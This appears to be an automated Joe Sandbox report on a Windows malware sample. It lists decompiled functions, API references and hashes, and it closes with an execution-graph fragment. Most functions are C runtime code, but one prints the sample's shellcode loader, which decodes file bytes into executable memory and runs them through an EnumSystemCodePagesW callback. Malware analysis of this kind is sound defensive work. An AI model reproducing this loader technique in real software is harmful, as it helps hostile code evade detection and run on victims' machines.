                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003B420F
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003B4222
                      • Part of subcall function 003B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003B4235
                    • __mtinitlocks.LIBCMT ref: 003B381A
                    • __mtterm.LIBCMT ref: 003B3823
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B447A
                      • Part of subcall function 003B388B: _free.LIBCMT ref: 003B4481
                      • Part of subcall function 003B388B: DeleteCriticalSection.KERNEL32(003C3558,?,?,003B3828,003B163A,003C2190,00000014), ref: 003B44A3
                    • __calloc_crt.LIBCMT ref: 003B3848
                    • __initptd.LIBCMT ref: 003B386A
                    • GetCurrentThreadId.KERNEL32 ref: 003B3871
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                    • String ID:
                    • API String ID: 3567560977-0
                    • Opcode ID: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction ID: 1d4322243ea08b2953d89089327b051f506d4e11de0ef82a23df88f6346f6a65
                    • Opcode Fuzzy Hash: 3849b7306357cdb2b4968754146c725abfc3e7cb9b8b7429e5e1d4395a25ace0
                    • Instruction Fuzzy Hash: B9F0623250962159E23B76797C026DA2684CF0277CF21862EF750DC8D2EF219A414695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E003B91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				intOrPtr _v12;
                    				signed int _v20;
                    				signed int _t35;
                    				int _t38;
                    				signed int _t41;
                    				int _t42;
                    				intOrPtr* _t44;
                    				int _t47;
                    				short* _t49;
                    				intOrPtr _t50;
                    				intOrPtr _t54;
                    				int _t55;
                    				signed int _t59;
                    				char* _t62;
                    
                    				_t62 = _a8;
                    				if(_t62 == 0) {
                    					L5:
                    					return 0;
                    				}
                    				_t50 = _a12;
                    				if(_t50 == 0) {
                    					goto L5;
                    				}
                    				if( *_t62 != 0) {
                    					E003B4BFC( &_v20, _a16);
                    					_t35 = _v20;
                    					__eflags =  *(_t35 + 0xa8);
                    					if( *(_t35 + 0xa8) != 0) {
                    						_t38 = E003B917B( *_t62 & 0x000000ff,  &_v20);
                    						__eflags = _t38;
                    						if(_t38 == 0) {
                    							__eflags = _a4;
                    							_t41 = _v20;
                    							_t59 = 1;
                    							_t28 = _t41 + 4; // 0x840ffff8
                    							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                    							__eflags = _t42;
                    							if(_t42 != 0) {
                    								L21:
                    								__eflags = _v8;
                    								if(_v8 != 0) {
                    									_t54 = _v12;
                    									_t31 = _t54 + 0x70;
                    									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                    									__eflags =  *_t31;
                    								}
                    								return _t59;
                    							}
                    							L20:
                    							_t44 = E003B1CC3();
                    							_t59 = _t59 | 0xffffffff;
                    							__eflags = _t59;
                    							 *_t44 = 0x2a;
                    							goto L21;
                    						}
                    						_t59 = _v20;
                    						__eflags =  *(_t59 + 0x74) - 1;
                    						if( *(_t59 + 0x74) <= 1) {
                    							L15:
                    							_t20 = _t59 + 0x74; // 0xe1c11fe1
                    							__eflags = _t50 -  *_t20;
                    							L16:
                    							if(__eflags < 0) {
                    								goto L20;
                    							}
                    							__eflags = _t62[1];
                    							if(_t62[1] == 0) {
                    								goto L20;
                    							}
                    							L18:
                    							_t22 = _t59 + 0x74; // 0xe1c11fe1
                    							_t59 =  *_t22;
                    							goto L21;
                    						}
                    						_t12 = _t59 + 0x74; // 0xe1c11fe1
                    						__eflags = _t50 -  *_t12;
                    						if(__eflags < 0) {
                    							goto L16;
                    						}
                    						__eflags = _a4;
                    						_t17 = _t59 + 0x74; // 0xe1c11fe1
                    						_t18 = _t59 + 4; // 0x840ffff8
                    						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                    						_t59 = _v20;
                    						__eflags = _t47;
                    						if(_t47 != 0) {
                    							goto L18;
                    						}
                    						goto L15;
                    					}
                    					_t55 = _a4;
                    					__eflags = _t55;
                    					if(_t55 != 0) {
                    						 *_t55 =  *_t62 & 0x000000ff;
                    					}
                    					_t59 = 1;
                    					goto L21;
                    				}
                    				_t49 = _a4;
                    				if(_t49 != 0) {
                    					 *_t49 = 0;
                    				}
                    				goto L5;
                    			}



















                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B91FC
                    • __isleadbyte_l.LIBCMT ref: 003B922A
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 003B9258
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 003B928E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID: 8a;
                    • API String ID: 3058430110-416603896
                    • Opcode ID: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction ID: f90b010a2e6e9fa2754f3460f5b6640f4af5431d2e26d5b14c80d42e11a85a22
                    • Opcode Fuzzy Hash: a938dfdd50aebfcec93b2d4ef4decd16b3633a225d5eeb03dd4b59e3f72e1bc7
                    • Instruction Fuzzy Hash: 6A31C331A0024ABFDB238F69CC44BEA7BA9FF41318F16492AE7158B990D731D850DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E003B12BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                    				char* _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __esi;
                    				signed int _t74;
                    				signed int _t78;
                    				char _t81;
                    				signed int _t86;
                    				signed int _t88;
                    				signed int _t91;
                    				signed int _t94;
                    				signed int _t97;
                    				signed int _t98;
                    				char* _t99;
                    				signed int _t100;
                    				signed int _t102;
                    				signed int _t103;
                    				signed int _t104;
                    				char* _t110;
                    				signed int _t113;
                    				signed int _t117;
                    				signed int _t119;
                    				void* _t120;
                    
                    				_t99 = _a4;
                    				_t74 = _a8;
                    				_v8 = _t99;
                    				_v12 = _t74;
                    				if(_a12 == 0) {
                    					L5:
                    					return 0;
                    				}
                    				_t97 = _a16;
                    				if(_t97 == 0) {
                    					goto L5;
                    				}
                    				if(_t99 != 0) {
                    					_t119 = _a20;
                    					__eflags = _t119;
                    					if(_t119 == 0) {
                    						L9:
                    						__eflags = _a8 - 0xffffffff;
                    						if(_a8 != 0xffffffff) {
                    							_t74 = E003B1530(_t99, 0, _a8);
                    							_t120 = _t120 + 0xc;
                    						}
                    						__eflags = _t119;
                    						if(_t119 == 0) {
                    							goto L3;
                    						} else {
                    							_t78 = _t74 | 0xffffffff;
                    							__eflags = _t97 - _t78 / _a12;
                    							if(_t97 > _t78 / _a12) {
                    								goto L3;
                    							}
                    							L13:
                    							_t117 = _a12 * _t97;
                    							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                    							_t98 = _t117;
                    							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                    								_t100 = 0x1000;
                    							} else {
                    								_t100 =  *(_t119 + 0x18);
                    							}
                    							_v16 = _t100;
                    							__eflags = _t117;
                    							if(_t117 == 0) {
                    								L41:
                    								return _a16;
                    							} else {
                    								do {
                    									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                    									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                    										L24:
                    										__eflags = _t98 - _t100;
                    										if(_t98 < _t100) {
                    											_t81 = E003B2752(_t98, _t119, _t119);
                    											__eflags = _t81 - 0xffffffff;
                    											if(_t81 == 0xffffffff) {
                    												L46:
                    												return (_t117 - _t98) / _a12;
                    											}
                    											_t102 = _v12;
                    											__eflags = _t102;
                    											if(_t102 == 0) {
                    												L42:
                    												__eflags = _a8 - 0xffffffff;
                    												if(_a8 != 0xffffffff) {
                    													E003B1530(_a4, 0, _a8);
                    												}
                    												 *((intOrPtr*)(E003B1CC3())) = 0x22;
                    												L4:
                    												E003B1E89();
                    												goto L5;
                    											}
                    											_t110 = _v8;
                    											 *_t110 = _t81;
                    											_t98 = _t98 - 1;
                    											_v8 = _t110 + 1;
                    											_t103 = _t102 - 1;
                    											__eflags = _t103;
                    											_v12 = _t103;
                    											_t100 =  *(_t119 + 0x18);
                    											_v16 = _t100;
                    											goto L40;
                    										}
                    										__eflags = _t100;
                    										if(_t100 == 0) {
                    											_t86 = 0x7fffffff;
                    											__eflags = _t98 - 0x7fffffff;
                    											if(_t98 <= 0x7fffffff) {
                    												_t86 = _t98;
                    											}
                    										} else {
                    											__eflags = _t98 - 0x7fffffff;
                    											if(_t98 <= 0x7fffffff) {
                    												_t44 = _t98 % _t100;
                    												__eflags = _t44;
                    												_t113 = _t44;
                    												_t91 = _t98;
                    											} else {
                    												_t113 = 0x7fffffff % _t100;
                    												_t91 = 0x7fffffff;
                    											}
                    											_t86 = _t91 - _t113;
                    										}
                    										__eflags = _t86 - _v12;
                    										if(_t86 > _v12) {
                    											goto L42;
                    										} else {
                    											_push(_t86);
                    											_push(_v8);
                    											_push(E003B2873(_t119));
                    											_t88 = E003B2A2A();
                    											_t120 = _t120 + 0xc;
                    											__eflags = _t88;
                    											if(_t88 == 0) {
                    												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                    												goto L46;
                    											}
                    											__eflags = _t88 - 0xffffffff;
                    											if(_t88 == 0xffffffff) {
                    												L45:
                    												_t64 = _t119 + 0xc;
                    												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                    												__eflags =  *_t64;
                    												goto L46;
                    											}
                    											_t98 = _t98 - _t88;
                    											__eflags = _t98;
                    											L36:
                    											_v8 = _v8 + _t88;
                    											_v12 = _v12 - _t88;
                    											_t100 = _v16;
                    											goto L40;
                    										}
                    									}
                    									_t94 =  *(_t119 + 4);
                    									_v20 = _t94;
                    									__eflags = _t94;
                    									if(__eflags == 0) {
                    										goto L24;
                    									}
                    									if(__eflags < 0) {
                    										goto L45;
                    									}
                    									__eflags = _t98 - _t94;
                    									if(_t98 < _t94) {
                    										_t94 = _t98;
                    										_v20 = _t98;
                    									}
                    									_t104 = _v12;
                    									__eflags = _t94 - _t104;
                    									if(_t94 > _t104) {
                    										goto L42;
                    									} else {
                    										E003B2897(_v8, _t104,  *_t119, _t94);
                    										_t88 = _v20;
                    										_t120 = _t120 + 0x10;
                    										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                    										_t98 = _t98 - _t88;
                    										 *_t119 =  *_t119 + _t88;
                    										goto L36;
                    									}
                    									L40:
                    									__eflags = _t98;
                    								} while (_t98 != 0);
                    								goto L41;
                    							}
                    						}
                    					}
                    					_t74 = (_t74 | 0xffffffff) / _a12;
                    					__eflags = _t97 - _t74;
                    					if(_t97 <= _t74) {
                    						goto L13;
                    					}
                    					goto L9;
                    				}
                    				L3:
                    				 *((intOrPtr*)(E003B1CC3())) = 0x16;
                    				goto L4;
                    			}





























                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                    • Instruction ID: 60d99b197231ce0c934cab5f082d7614c7c2df8dd9c24c669e9a0f134f01371b
                    • Opcode Fuzzy Hash: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                    • Instruction Fuzzy Hash: F251DC34A00305DBDB268F69D8A06DE77F5AF41328FA48729FA29C6DD0E770DE509B40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E003B7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                    				void* _t7;
                    				void* _t8;
                    				intOrPtr* _t9;
                    				intOrPtr* _t12;
                    				void* _t20;
                    				long _t31;
                    
                    				if(_a4 != 0) {
                    					_t31 = _a8;
                    					if(_t31 != 0) {
                    						_push(__ebx);
                    						while(_t31 <= 0xffffffe0) {
                    							if(_t31 == 0) {
                    								_t31 = _t31 + 1;
                    							}
                    							_t7 = HeapReAlloc( *0x3c4834, 0, _a4, _t31);
                    							_t20 = _t7;
                    							if(_t20 != 0) {
                    								L17:
                    								_t8 = _t20;
                    							} else {
                    								if( *0x3c4830 == _t7) {
                    									_t9 = E003B1CC3();
                    									 *_t9 = E003B1CD6(GetLastError());
                    									goto L17;
                    								} else {
                    									if(E003B1741(_t7, _t31) == 0) {
                    										_t12 = E003B1CC3();
                    										 *_t12 = E003B1CD6(GetLastError());
                    										L12:
                    										_t8 = 0;
                    									} else {
                    										continue;
                    									}
                    								}
                    							}
                    							goto L14;
                    						}
                    						E003B1741(_t6, _t31);
                    						 *((intOrPtr*)(E003B1CC3())) = 0xc;
                    						goto L12;
                    					} else {
                    						E003B4831(_a4);
                    						_t8 = 0;
                    					}
                    					L14:
                    					return _t8;
                    				} else {
                    					return E003B114B(__ebx, __edx, __edi, _a8);
                    				}
                    			}










                    APIs
                    • _malloc.LIBCMT ref: 003B745E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                    • _free.LIBCMT ref: 003B7471
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AllocHeap_free_malloc
                    • String ID:
                    • API String ID: 2734353464-0
                    • Opcode ID: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction ID: d400fa7217a6813c91135100b6f64ce9b3d2cad94987be52578c38d940adbfbc
                    • Opcode Fuzzy Hash: 0eb45a5bc7ac388f54b6b3a289265d43defd3ab56fadc40803c9fb5031a37b13
                    • Instruction Fuzzy Hash: 5511E33280D615ABCB233F76AC55AE93FDCEF4036DF214525FB499EE50DA7089408690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E003B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
                    				intOrPtr _v8;
                    				void* __ebx;
                    				void* __edi;
                    				intOrPtr _t6;
                    				void* _t7;
                    				void* _t20;
                    				_Unknown_base(*)()* _t21;
                    				void* _t26;
                    				void* _t27;
                    				void* _t28;
                    				intOrPtr* _t34;
                    
                    				_push(_t20);
                    				_t28 = 0;
                    				_t6 = E003B114B(_t20, _t26, 0, 0x17d78400);
                    				 *_t34 = 0x3c3000;
                    				_v8 = _t6;
                    				_t7 = E003B11DD(_a12, _t27);
                    				_t21 = VirtualAlloc(0, 0x1466, 0x3000, 0x40);
                    				E003B1481(_t21, 0x1466, 1, _t7);
                    				_t10 = _v8;
                    				if(_v8 != 0) {
                    					E003B1530(_t10, 0xcb, 0x17d78400);
                    					do {
                    						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x0000006f ^ 0x00000059) + 0x0000000b ^ 0x00000054) - 0x17;
                    						_t28 = _t28 + 1;
                    					} while (_t28 < 0x1466);
                    					EnumSystemCodePagesW(_t21, 0);
                    				}
                    				return 0;
                    			}















                    APIs
                    • _malloc.LIBCMT ref: 003B100E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                      • Part of subcall function 003B11DD: __wfsopen.LIBCMT ref: 003B11E8
                    • VirtualAlloc.KERNEL32(00000000,00001466,00003000,00000040), ref: 003B1036
                    • __fread_nolock.LIBCMT ref: 003B1048
                    • _memset.LIBCMT ref: 003B1062
                    • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 003B1082
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                    • String ID:
                    • API String ID: 612201108-0
                    • Opcode ID: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction ID: 2e38a4303b32ce40cae24b4c862d45957ad6e53e4632fe16628bc61f9f3e880a
                    • Opcode Fuzzy Hash: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction Fuzzy Hash: E30147729053447BE722277A9C4BFDB3B5CCB52B5CF500425FB019A182E5E499029274
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E003B8BC0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				void* _t4;
                    				void* _t15;
                    				void* _t17;
                    
                    				_push(8);
                    				_push(0x3c24b0);
                    				_t4 = E003B2400(__ebx, __edi, __esi);
                    				_t17 =  *0x3c3d3c - 0x3c3d40; // 0x3c3d40
                    				if(_t17 != 0) {
                    					E003B442F(0xc);
                    					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
                    					 *0x3c3d3c = E003B73D6("@=<", 0x3c3d40);
                    					 *(_t15 - 4) = 0xfffffffe;
                    					_t4 = E003B8C09();
                    				}
                    				return E003B2445(_t4);
                    			}







                    APIs
                    • __lock.LIBCMT ref: 003B8BDB
                      • Part of subcall function 003B442F: __mtinitlocknum.LIBCMT ref: 003B4441
                      • Part of subcall function 003B442F: EnterCriticalSection.KERNEL32(00000000,?,003B37AB,0000000D), ref: 003B445A
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003B8BEB
                      • Part of subcall function 003B73D6: ___addlocaleref.LIBCMT ref: 003B73F2
                      • Part of subcall function 003B73D6: ___removelocaleref.LIBCMT ref: 003B73FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                    • String ID: @=<$@=<
                    • API String ID: 3307898166-522152547
                    • Opcode ID: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction ID: a5f234f2f53e71cc729f41302692f6212e64a8ca5f508f7b5c9ebec28bc15cbb
                    • Opcode Fuzzy Hash: dff810c5e7d389fa50397f59b51fc7cd5435a04b6d428c132332e9e3c892fa37
                    • Instruction Fuzzy Hash: EBE08661481300D6D65377617807FCDA6749B0072AF10D10AF2159E9C1CEB45E408B66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E003BA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				intOrPtr _t25;
                    				void* _t26;
                    
                    				_t25 = _a16;
                    				if(_t25 == 0x65 || _t25 == 0x45) {
                    					_t26 = E003BAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    					goto L9;
                    				} else {
                    					_t34 = _t25 - 0x66;
                    					if(_t25 != 0x66) {
                    						__eflags = _t25 - 0x61;
                    						if(_t25 == 0x61) {
                    							L7:
                    							_t26 = E003BA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                    						} else {
                    							__eflags = _t25 - 0x41;
                    							if(__eflags == 0) {
                    								goto L7;
                    							} else {
                    								_t26 = E003BB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    							}
                    						}
                    						L9:
                    						return _t26;
                    					} else {
                    						return E003BB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                    					}
                    				}
                    			}






                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319291070.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000002.00000002.319277661.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319320749.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319406542.00000000003C3000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.319419386.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 791246b61bd22ebdfa6a228266e53b4722b2487872a4a3b9bbf5b3af0b705a21
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 0E013972044A4EBBCF135E84CC418EE3F66BB19358B5A8515FB1958831D736C9B1BB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E016FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                    				void* _t7;
                    				intOrPtr _t9;
                    				intOrPtr _t10;
                    				intOrPtr* _t12;
                    				intOrPtr* _t13;
                    				intOrPtr _t14;
                    				intOrPtr* _t15;
                    
                    				_t13 = __edx;
                    				_push(_a4);
                    				_t14 =  *[fs:0x18];
                    				_t15 = _t12;
                    				_t7 = E016ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                    				_push(_t13);
                    				E016F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                    				_t9 =  *_t15;
                    				if(_t9 == 0xffffffff) {
                    					_t10 = 0;
                    				} else {
                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                    				}
                    				_push(_t10);
                    				_push(_t15);
                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                    				return E016F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                    			}











                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016FFDFA
                    Strings
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016FFE01
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016FFE2B
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 312d6525b9df26b98b36308ac9c8fcd9cf8862acf02268bc1b2a0bed58dfc443
                    • Instruction ID: f32eab876afa6909820bc139aa5b3f271e43e279468b4b688cb3d82652ca79c8
                    • Opcode Fuzzy Hash: 312d6525b9df26b98b36308ac9c8fcd9cf8862acf02268bc1b2a0bed58dfc443
                    • Instruction Fuzzy Hash: 08F0C272640202BBE6201A45DC02E23BF5AEB44B30F14021CF728561D1EA62BC2086A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.8%
                    Dynamic/Decrypted Code Coverage:2%
                    Signature Coverage:0%
                    Total number of Nodes:596
                    Total number of Limit Nodes:70
97d327 34212->34213 34220 97f710 34213->34220 34217 97d39b 34219 97908b 34217->34219 34231 98a2a0 LdrLoadDll 34217->34231 34219->34159 34221 97f735 34220->34221 34232 9781a0 34221->34232 34223 97d36f 34228 98a6e0 34223->34228 34224 984a50 8 API calls 34226 97f759 34224->34226 34226->34223 34226->34224 34227 98bdc0 2 API calls 34226->34227 34239 97f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34226->34239 34227->34226 34229 98af60 LdrLoadDll 34228->34229 34230 98a6ff CreateProcessInternalW 34229->34230 34230->34217 34231->34219 34233 97829f 34232->34233 34234 9781b5 34232->34234 34233->34226 34234->34233 34235 984a50 8 API calls 34234->34235 34236 978222 34235->34236 34237 98bdc0 2 API calls 34236->34237 34238 978249 34236->34238 34237->34238 34238->34226 34239->34226 34241 984e50 LdrLoadDll 34240->34241 34242 97f6ef 34241->34242 34243 97f6f6 SetErrorMode 34242->34243 34244 97f6fd 34242->34244 34243->34244 34244->34170 34258 97f4a0 34245->34258 34247 9843c6 34247->34174 34249 98bd40 2 API calls 34248->34249 34250 978ad5 34249->34250 34251 978cea 34250->34251 34277 989880 34250->34277 34251->34177 34254 97f683 34253->34254 34255 97f6ae 34254->34255 34326 989e90 34254->34326 34255->34184 34257->34184 34259 97f4bd 34258->34259 34265 989fc0 34259->34265 34262 97f505 34262->34247 34266 989fdc 34265->34266 34267 98af60 LdrLoadDll 34265->34267 34275 53f99a0 LdrInitializeThunk 34266->34275 34267->34266 34268 97f4fe 34268->34262 34270 98a010 34268->34270 34271 98af60 LdrLoadDll 34270->34271 34272 98a02c 34271->34272 34276 53f9780 LdrInitializeThunk 